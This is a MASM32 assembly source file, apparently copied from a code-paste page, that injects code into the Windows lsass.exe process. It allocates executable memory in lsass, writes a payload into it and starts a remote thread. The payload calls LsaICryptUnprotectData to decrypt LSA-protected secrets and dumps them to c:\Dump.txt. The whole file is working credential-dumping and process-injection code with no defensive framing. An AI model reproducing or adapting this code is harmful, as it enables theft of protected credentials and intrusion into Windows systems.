1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 |
;http://mnin.blogspot.com/2007/05/injecting-code-into-privileged-win32.html <-- Injecting into Lsass.exe security .386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include \masm32\include\lsasrv.inc include \masm32\include\ntdll.inc includelib \masm32\lib\kernel32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\lsasrv.lib includelib \masm32\lib\ntdll.lib CLIENTID struct UniqueProcess dd ? UniqueThread dd ? CLIENTID ends .const PROCESS_HANDLE equ 0 PROCESS_ID equ 1 .data szProcess db 'lsass.exe',0 szKernel db 'KERNEL32',0 szGetProcAddress db 'GetProcAddress',0 szFailed db 'Failed', 0 .data? hProcess dd ? lpInjected dd ? lenInjected dd ? pInfo PROCESS_INFORMATION <> sInfo STARTUPINFO <> myCID CLIENTID <> hThread dd ? Injected PROTO:DWORD .code Injected PROC lpGetProcAddress:DWORD LOCAL Stack[20h]:dword LOCAL entropy[16]:byte LOCAL Buffer[100h]:byte LOCAL cbSize:dword LOCAL BytesReturned:dword ASSUME fs:NOTHING push ebp xor eax,eax mov esi,fs:[eax+30h] mov esi,[esi+0Ch] mov esi,[esi+1Ch] next_module: mov ebp,[esi+08h] mov edi,[esi+20h] mov esi,[esi] cmp [edi+12*2],al jne next_module cmp byte ptr[edi],6Bh je find_kernel32_finished cmp byte ptr[edi],4Bh je find_kernel32_finished jmp next_module find_kernel32_finished: mov ecx,ebp pop ebp mov eax,lpGetProcAddress mov Stack,eax mov Stack+4,ecx call loc_1 _szLoadLibraryA db "LoadLibraryA",0 loc_1: pop ecx invoke (type GetProcAddress)ptr Stack,Stack+4,ecx mov Stack+8,eax call loc_2 _szlsasrv db "lsasrv.dll",0 loc_2: pop ecx invoke (type LoadLibrary)ptr Stack+8,ecx mov Stack+12,eax call loc_3 _szLsaICryptUnprotectData db "LsaICryptUnprotectData",0 loc_3: pop ecx invoke (type GetProcAddress)ptr Stack,Stack+12,ecx mov Stack+16,eax invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize call loc_4 _szCreateFileA db "CreateFileA",0 loc_4: pop ecx invoke (type GetProcAddress)ptr Stack,Stack+4,ecx mov Stack+20,eax call loc_5 _szWriteFile db "WriteFile",0 loc_5: pop ecx invoke (type GetProcAddress)ptr Stack,Stack+4,ecx mov Stack+24,eax call loc_6 _szCloseHandle db "CloseHandle",0 loc_6: pop ecx invoke (type GetProcAddress)ptr Stack,Stack+4,ecx mov Stack+28,eax call loc_7 _szExitThread db "ExitThread",0 loc_7: pop ecx invoke (type GetProcAddress)ptr Stack,Stack+4,ecx mov Stack+32,eax call loc_8 FileName db "c:\Dump.txt", 0 loc_8: pop ecx ;BreakpointHere db 0cch invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 mov ecx, eax invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0 invoke (type CloseHandle)ptr Stack+28, ECX invoke (type ExitThread)ptr Stack+32, 0 ret Injected endp EndInjected: FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword LOCAL Process :PROCESSENTRY32 lea esi,Process assume esi:ptr PROCESSENTRY32 mov [esi].dwSize, sizeof PROCESSENTRY32 invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 mov edi,eax invoke Process32First,edi,esi .while eax!=FALSE lea eax,[esi].szExeFile invoke lstrcmpi,eax,_exename .if eax==0 ;---found process--- mov eax,[esi].th32ProcessID jmp @return .endif invoke Process32Next,edi,esi .endw @return: assume esi:nothing push eax invoke CloseHandle,edi pop eax .if _returntype==PROCESS_HANDLE invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax ;return hProcess .endif ret FindProcessByName endp start: ;invoke GetModuleHandle,addr szKernel ;invoke GetProcAddress,eax,addr szGetProcAddress ;invoke Injected, EAX ;invoke ExitProcess,0 mov ebx,EndInjected sub ebx,Injected mov lenInjected,ebx invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE mov hProcess, eax invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov lpInjected,eax invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0 ;invoke EnableTokenPrivilege,SE_DEBUG_PRIVILEGE invoke GetModuleHandle,addr szKernel invoke GetProcAddress,eax,addr szGetProcAddress ;invoke RtlCreateUserThread, hProcess, 0, FALSE, 0, 0, 0, lpInjected, eax, ADDR hThread, ADDR myCID invoke CreateRemoteThread, hProcess, 0, 0, lpInjected, eax, 0, 0 ;NEEDS DEBUG PRIVILEGE .IF EAX == 0 invoke MessageBoxA, 0, ADDR szFailed, ADDR szFailed, 0 .ENDIF invoke ExitProcess,0 end start |